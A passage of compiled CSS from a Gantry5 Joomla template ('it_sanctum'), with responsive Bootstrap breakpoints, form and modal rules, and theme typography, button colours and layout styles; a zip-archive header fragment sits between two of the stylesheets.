  .row-fluid .offset6:first-child {
    margin-left: 51.3812154696%;
  }
  /* line 312, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset5 {
    margin-left: 45.5801104972%;
  }
  /* line 315, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset5:first-child {
    margin-left: 42.817679558%;
  }
  /* line 318, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset4 {
    margin-left: 37.0165745856%;
  }
  /* line 321, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset4:first-child {
    margin-left: 34.2541436464%;
  }
  /* line 324, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset3 {
    margin-left: 28.453038674%;
  }
  /* line 327, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset3:first-child {
    margin-left: 25.6906077348%;
  }
  /* line 330, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset2 {
    margin-left: 19.8895027624%;
  }
  /* line 333, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset2:first-child {
    margin-left: 17.1270718232%;
  }
  /* line 336, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset1 {
    margin-left: 11.3259668508%;
  }
  /* line 339, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset1:first-child {
    margin-left: 8.5635359116%;
  }
  /* line 342, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input, textarea, .uneditable-input {
    margin-left: 0;
  }
  /* line 347, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 20px;
  }
  /* line 350, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span12, textarea.span12, .uneditable-input.span12 {
    width: 710px;
  }
  /* line 355, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span11, textarea.span11, .uneditable-input.span11 {
    width: 648px;
  }
  /* line 360, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span10, textarea.span10, .uneditable-input.span10 {
    width: 586px;
  }
  /* line 365, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span9, textarea.span9, .uneditable-input.span9 {
    width: 524px;
  }
  /* line 370, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span8, textarea.span8, .uneditable-input.span8 {
    width: 462px;
  }
  /* line 375, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span7, textarea.span7, .uneditable-input.span7 {
    width: 400px;
  }
  /* line 380, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span6, textarea.span6, .uneditable-input.span6 {
    width: 338px;
  }
  /* line 385, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span5, textarea.span5, .uneditable-input.span5 {
    width: 276px;
  }
  /* line 390, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span4, textarea.span4, .uneditable-input.span4 {
    width: 214px;
  }
  /* line 395, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span3, textarea.span3, .uneditable-input.span3 {
    width: 152px;
  }
  /* line 400, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span2, textarea.span2, .uneditable-input.span2 {
    width: 90px;
  }
  /* line 405, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span1, textarea.span1, .uneditable-input.span1 {
    width: 28px;
  }
}
@media only all and (max-width: 59.938rem) {
  /* line 413, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top, .navbar-fixed-bottom {
    position: static;
  }
  /* line 417, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top {
    margin-bottom: 20px;
  }
  /* line 420, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-bottom {
    margin-top: 20px;
  }
  /* line 423, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner {
    padding: 5px;
  }
  /* line 427, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .container {
    width: auto;
    padding: 0;
  }
  /* line 431, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .brand {
    padding-right: 10px;
    padding-left: 10px;
    margin: 0 0 0 -5px;
  }
  /* line 436, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse {
    clear: both;
  }
  /* line 439, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav {
    float: none;
    margin: 0 0 10px;
  }
  /* line 443, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li {
    float: none;
  }
  /* line 446, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a {
    margin-bottom: 2px;
  }
  /* line 449, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > .divider-vertical {
    display: none;
  }
  /* line 452, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav .nav-header {
    color: #777;
    text-shadow: none;
  }
  /* line 456, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a, .nav-collapse .dropdown-menu a {
    padding: 9px 15px;
    font-weight: bold;
    color: #777;
    border-radius: 0.1875rem;
  }
  /* line 463, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .btn {
    padding: 4px 10px 4px;
    font-weight: normal;
    border-radius: 0.1875rem;
  }
  /* line 468, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu li + li a {
    margin-bottom: 2px;
  }
  /* line 471, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a:hover, .nav-collapse .nav > li > a:focus, .nav-collapse .dropdown-menu a:hover, .nav-collapse .dropdown-menu a:focus {
    background-color: #f2f2f2;
  }
  /* line 477, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .nav > li > a, .navbar-inverse .nav-collapse .dropdown-menu a {
    color: #999;
  }
  /* line 481, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .nav > li > a:hover, .navbar-inverse .nav-collapse .nav > li > a:focus, .navbar-inverse .nav-collapse .dropdown-menu a:hover, .navbar-inverse .nav-collapse .dropdown-menu a:focus {
    background-color: #111;
  }
  /* line 487, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse.in .btn-group {
    padding: 0;
    margin-top: 5px;
  }
  /* line 491, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu {
    position: static;
    top: auto;
    left: auto;
    display: none;
    float: none;
    max-width: none;
    padding: 0;
    margin: 0 15px;
    background-color: transparent;
    border: none;
    border-radius: 0;
    box-shadow: none;
  }
  /* line 505, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .open > .dropdown-menu {
    display: block;
  }
  /* line 508, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu:before, .nav-collapse .dropdown-menu:after {
    display: none;
  }
  /* line 512, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu .divider {
    display: none;
  }
  /* line 515, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > .dropdown-menu:before, .nav-collapse .nav > li > .dropdown-menu:after {
    display: none;
  }
  /* line 519, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .navbar-form, .nav-collapse .navbar-search {
    float: none;
    padding: 10px 15px;
    margin: 10px 0;
    border-top: 1px solid #f2f2f2;
    border-bottom: 1px solid #f2f2f2;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  }
  /* line 528, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .navbar-form, .navbar-inverse .nav-collapse .navbar-search {
    border-top-color: #111;
    border-bottom-color: #111;
  }
  /* line 533, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .nav-collapse .nav.pull-right {
    float: none;
    margin-left: 0;
  }
  /* line 537, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse, .nav-collapse.collapse {
    height: 0;
    overflow: hidden;
  }
  /* line 542, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .btn-navbar {
    display: block;
  }
  /* line 545, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-static .navbar-inner {
    padding-right: 10px;
    padding-left: 10px;
  }
}
@media only all and (min-width: 60rem) {
  /* line 552, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse.collapse {
    height: auto !important;
    overflow: visible !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  /* line 3, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  .form-horizontal .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  /* line 9, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  .form-horizontal .controls {
    margin: 0;
  }
  /* line 14, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  [dir="rtl"] .form-horizontal .control-label {
    text-align: right;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal {
    position: fixed;
    top: 20px;
    right: 20px;
    left: 20px;
    width: auto;
    margin: 0;
  }
  /* line 10, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal.fade {
    top: -100px;
  }
  /* line 13, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal.fade.in {
    top: 20px;
  }
}
@media only all and (max-width: 30rem) {
  /* line 19, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal {
    top: 10px;
    right: 10px;
    left: 10px;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 27, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  /* line 28, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  .pull-right.item-image {
    margin-left: 0;
  }
  /* line 33, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  /* line 34, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  .pull-left.item-image {
    margin-right: 0;
  }
}
/*# sourceMappingURL=sanctum-joomla__body_only.css.map */PK!R��L����5it_sanctum/custom/css-compiled/sanctum__body_only.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.

   WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!

   For more information on modifying CSS, please read:

   http://docs.gantry.org/gantry5/configure/styles
   http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

@import url('//fonts.googleapis.com/css?family=Lato');
@import url('//fonts.googleapis.com/css?family=Cormorant+SC');
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 12, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 9, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/_flex.scss */
.g-content {
  margin: 0.625rem;
  padding: 0.938rem;
}
/* line 6, media/gantry5/engines/nucleus/scss/nucleus/theme/_flex.scss */
.g-flushed .g-content {
  margin: 0;
  padding: 0;
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
body {
  font-size: 1rem;
  line-height: 1.5;
}
/* line 8, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h1 {
  font-size: 2.7rem;
}
/* line 12, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h2 {
  font-size: 2.07rem;
}
/* line 16, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h3 {
  font-size: 1.8rem;
}
/* line 20, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h4 {
  font-size: 1.35rem;
}
/* line 24, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h5 {
  font-size: 0.9rem;
}
/* line 28, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
h6 {
  font-size: 0.81rem;
}
/* line 33, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
small {
  font-size: 0.875rem;
}
/* line 37, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
cite {
  font-size: 0.875rem;
}
/* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
sub, sup {
  font-size: 0.75rem;
}
/* line 46, media/gantry5/engines/nucleus/scss/nucleus/theme/_typography.scss */
code, kbd, pre, samp {
  font-size: 1rem;
  font-family: "Menlo", "Monaco", monospace;
}
/* line 1, media/gantry5/engines/nucleus/scss/nucleus/theme/_forms.scss */
textarea, select[multiple=multiple], input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]) {
  border-radius: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_core.scss */
body, #g-page-surround {
  color: #959595;
  background-color: #fff;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
/* line 14, templates/it_sanctum/scss/sanctum/_core.scss */
#g-page-surround {
  box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}
@media print {
  /* line 19, templates/it_sanctum/scss/sanctum/_core.scss */
  #g-page-surround {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 25, templates/it_sanctum/scss/sanctum/_core.scss */
a {
  color: #4f953b;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 28, templates/it_sanctum/scss/sanctum/_core.scss */
a:hover {
  color: #325e25;
}
/* line 33, templates/it_sanctum/scss/sanctum/_core.scss */
h1, h2, h3, h4, h5, h6, strong {
  color: #282828;
}
/* line 37, templates/it_sanctum/scss/sanctum/_core.scss */
.button {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  background: #4f953b;
  color: #fff;
  border: 1px solid #4f953b;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 51, templates/it_sanctum/scss/sanctum/_core.scss */
.button:hover {
  color: #fff;
  background: #40782f;
}
/* line 55, templates/it_sanctum/scss/sanctum/_core.scss */
.button:active, .button:focus {
  color: #fff;
  background: #437f32;
}
/* line 59, templates/it_sanctum/scss/sanctum/_core.scss */
.button.dark {
  background: #282828;
  border: 1px solid #282828;
}
/* line 62, templates/it_sanctum/scss/sanctum/_core.scss */
.button.dark:hover, .button.dark:active, .button.dark:focus {
  background: #474747;
}
/* line 66, templates/it_sanctum/scss/sanctum/_core.scss */
.button.empty {
  background: none;
  border: 1px solid #4f953b;
  color: #4f953b;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 71, templates/it_sanctum/scss/sanctum/_core.scss */
.button.empty:hover {
  color: #fff;
  background: #4f953b;
}
/* line 78, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 79, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-grey {
  background: #a8a8a8;
  color: #fff;
  border: 1px solid #a8a8a8;
}
/* line 83, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-grey:hover {
  background: #999;
  border: 1px solid #999;
}
/* line 88, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-green {
  background: #4f953b;
  border: 1px solid #4f953b;
}
/* line 91, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-green:hover {
  background: #437f32;
  border: 1px solid #437f32;
}
/* line 96, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-orange {
  background: #f26d5b;
  border: 1px solid #f26d5b;
}
/* line 99, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-orange:hover {
  background: #f0543f;
  border: 1px solid #f26d5b;
}
/* line 104, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-purple {
  background: #8283a7;
  border: 1px solid #8283a7;
}
/* line 107, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-purple:hover {
  background: #70719a;
  border: 1px solid #70719a;
}
/* line 112, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-blue {
  background: #2b90d9;
  border: 1px solid #2b90d9;
}
/* line 115, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-blue:hover {
  background: #2380c3;
  border: 1px solid #2380c3;
}
/* line 120, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-xlarge {
  font-size: 1.4rem;
}
/* line 123, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-large {
  font-size: 1.2rem;
}
/* line 126, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-small {
  font-size: 0.8rem;
}
/* line 129, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-xsmall {
  font-size: 0.7rem;
}
/* line 132, templates/it_sanctum/scss/sanctum/_core.scss */
.button.button-block {
  display: block;
}
/* line 137, templates/it_sanctum/scss/sanctum/_core.scss */
.g-title {
  margin-top: -5px;
  margin-bottom: 30px;
  position: relative;
}
/* line 141, templates/it_sanctum/scss/sanctum/_core.scss */
.g-title:after {
  content: "";
  height: 1px;
  width: 70px;
  margin: 20px 0;
  display: block;
  background: #ddd;
}
/* line 151, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 152, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 153, templates/it_sanctum/scss/sanctum/_core.scss */
#g-offcanvas .g-title:before, .g-particle-intro .g-title:before, #g-offcanvas .g-title:after, .g-particle-intro .g-title:after {
  display: none;
}
/* line 159, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 160, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-title, #g-sidebar .g-title {
  font-size: 1.35rem;
  margin-top: 0;
  margin-bottom: 25px;
}
/* line 164, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-title:before, #g-sidebar .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:after {
  width: 60px;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  #g-aside .g-title:before, #g-sidebar .g-title:before, #g-aside .g-title:after, #g-sidebar .g-title:after {
    display: none;
  }
}
/* line 171, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 172, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 173, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .text-center .g-title:before, #g-sidebar .text-center .g-title:before, #g-aside .title-center .g-title:before, #g-sidebar .title-center .g-title:before, #g-aside .text-center .g-title:after, #g-sidebar .text-center .g-title:after, #g-aside .title-center .g-title:after, #g-sidebar .title-center .g-title:after {
  width: 40px;
}
/* line 178, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-content > div, #g-sidebar .g-content > div {
  margin-bottom: 50px;
}
/* line 181, templates/it_sanctum/scss/sanctum/_core.scss */
#g-aside .g-content > div:last-child, #g-sidebar .g-content > div:last-child {
  margin-bottom: 0;
}
/* line 189, templates/it_sanctum/scss/sanctum/_core.scss */
.border-bottom {
  border-bottom: 1px solid #ddd;
}
/* line 193, templates/it_sanctum/scss/sanctum/_core.scss */
.border-top {
  border-top: 1px solid #ddd;
}
/* line 197, templates/it_sanctum/scss/sanctum/_core.scss */
.g-logo {
  margin: 10px 0;
  display: inline-block;
}
/* line 199, templates/it_sanctum/scss/sanctum/_core.scss */
.g-logo > .g-content {
  margin-top: 0;
  margin-bottom: 0;
}
@media only all and (max-width: 47.938rem) {
  .g-logo {
    display: block;
    text-align: center;
  }
}
/* line 208, templates/it_sanctum/scss/sanctum/_core.scss */
.g-logo img {
  width: auto;
}
/* line 213, templates/it_sanctum/scss/sanctum/_core.scss */
.logo-large {
  display: inline-block;
}
/* line 218, templates/it_sanctum/scss/sanctum/_core.scss */
.g-gutter {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 221, templates/it_sanctum/scss/sanctum/_core.scss */
.g-gutter .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 229, templates/it_sanctum/scss/sanctum/_core.scss */
.fullwidth-section {
  padding: 0 !important;
}
/* line 231, templates/it_sanctum/scss/sanctum/_core.scss */
.fullwidth-section > .g-container {
  width: 100%;
}
/* line 234, templates/it_sanctum/scss/sanctum/_core.scss */
.fullwidth-section .g-content {
  padding: 0;
  margin: 0;
}
/* line 241, templates/it_sanctum/scss/sanctum/_core.scss */
.g-center-vertical {
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
}
/* line 247, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 248, templates/it_sanctum/scss/sanctum/_core.scss */
.tooltip h1, .tooltip h2, .tooltip h3, .tooltip h4, .tooltip h5, .tooltip h6, .tooltip strong {
  color: #fff !important;
}
/* line 254, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 255, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 256, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 257, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .g-menu-item-container:before {
  content: "";
  position: absolute;
  width: 20px;
  height: 20px;
  margin-top: 2px;
  border-radius: 0px;
  background: #000;
  border: 1px solid #fff;
}
/* line 267, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
/* line 271, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 272, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 273, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset1 .g-menu-item-container:before {
  background: #c91f37;
}
/* line 278, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 279, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 280, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset2 .g-menu-item-container:before {
  background: #4f953b;
}
/* line 285, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 286, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 287, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset3 .g-menu-item-container:before {
  background: #f26d5b;
}
/* line 292, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 293, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 294, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset4 .g-menu-item-container:before {
  background: #8283a7;
}
/* line 299, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 300, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 301, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset5 .g-menu-item-container:before {
  background: #2b90d9;
}
/* line 306, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 307, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 308, templates/it_sanctum/scss/sanctum/_core.scss */
.presets-demo .g-dropdown .preset6 .g-menu-item-container:before {
  background: #f2aa0f;
}
/* line 316, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 317, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 318, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 319, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 320, templates/it_sanctum/scss/sanctum/_core.scss */
/* line 321, templates/it_sanctum/scss/sanctum/_core.scss */
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container:before {
  content: "\f053";
  position: relative;
  width: 1.28571em;
  height: auto;
  margin-top: 0;
  border-radius: 0;
  background: none;
}
/* line 330, templates/it_sanctum/scss/sanctum/_core.scss */
#g-mobilemenu-container .presets-demo .g-dropdown .g-go-back .g-menu-item-container .g-menu-item-content {
  margin-left: 30px;
}
/* line 339, templates/it_sanctum/scss/sanctum/_core.scss */
.g-perso {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
  color: #fff;
  background-color: #7ac572;
}
/* line 348, templates/it_sanctum/scss/sanctum/_core.scss */
.g-perso-left {
  margin-bottom: 0;
  border-left: -20px solid white;
  background-color: #fff;
}
/* line 354, templates/it_sanctum/scss/sanctum/_core.scss */
.g-image2 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story2.jpg');
  background-repeat: no-repeat;
  padding-left: 0px;
  padding-top: 0px;
}
/* line 362, templates/it_sanctum/scss/sanctum/_core.scss */
.g-image3 {
  background-image: url('//www.ptits-anes.fr/images/Demo/elements/story3.jpg');
  background-repeat: no-repeat;
}
/* line 6, templates/it_sanctum/scss/sanctum/_typography.scss */
body {
  font-family: "Lato";
  font-weight: 400;
  font-size: 0.9rem;
}
/* line 12, templates/it_sanctum/scss/sanctum/_typography.scss */
h1, h2, h3, h4, h5, h6 {
  font-family: "Cormorant SC";
  font-weight: 500;
  margin-top: -5px;
}
/* line 18, templates/it_sanctum/scss/sanctum/_typography.scss */
h1 {
  font-size: 2.7rem;
}
/* line 21, templates/it_sanctum/scss/sanctum/_typography.scss */
h2 {
  font-size: 2.07rem;
}
/* line 24, templates/it_sanctum/scss/sanctum/_typography.scss */
h3 {
  font-size: 1.8rem;
}
/* line 27, templates/it_sanctum/scss/sanctum/_typography.scss */
h4 {
  font-size: 1.35rem;
}
/* line 30, templates/it_sanctum/scss/sanctum/_typography.scss */
h5 {
  font-size: 0.9rem;
}
/* line 33, templates/it_sanctum/scss/sanctum/_typography.scss */
h6 {
  font-size: 0.81rem;
}
/* line 37, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-main-nav {
  font-family: "Cormorant SC";
  font-weight: 400;
  font-size: 1rem;
}
/* line 43, templates/it_sanctum/scss/sanctum/_typography.scss */
.g-main-nav .g-dropdown {
  font-size: 0.9rem;
}
/* line 47, templates/it_sanctum/scss/sanctum/_typography.scss */
bold, strong {
  font-weight: 700;
}
/* line 51, templates/it_sanctum/scss/sanctum/_typography.scss */
.button {
  font-weight: 500;
}
/* line 56, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote {
  border-left: 10px solid #f0f2f4;
}
/* line 58, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote p {
  font-size: 1rem;
  color: #c8c8c8;
  margin-bottom: 1rem !important;
}
/* line 63, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote cite {
  display: block;
  text-align: right;
  color: #959595;
  font-size: 1.1rem;
}
/* line 69, templates/it_sanctum/scss/sanctum/_typography.scss */
/* line 70, templates/it_sanctum/scss/sanctum/_typography.scss */
blockquote small:before {
  content: none !important;
}
/* line 77, templates/it_sanctum/scss/sanctum/_typography.scss */
code {
  background: #fafafa;
  color: #d05;
  font-size: 0.81rem;
  border: 1px solid #ddd;
}
/* line 84, templates/it_sanctum/scss/sanctum/_typography.scss */
pre {
  padding: 1rem;
  margin: 2rem 0;
  background: #f8f8f8;
  border: 1px solid #ddd;
  border-radius: 0;
  line-height: 1.15;
  font-size: 0.81rem;
  border: 1px solid #ddd;
}
/* line 94, templates/it_sanctum/scss/sanctum/_typography.scss */
pre code {
  color: #237794;
  background: inherit;
  font-size: 0.81rem;
}
/* line 99, templates/it_sanctum/scss/sanctum/_typography.scss */
pre.prettyprint {
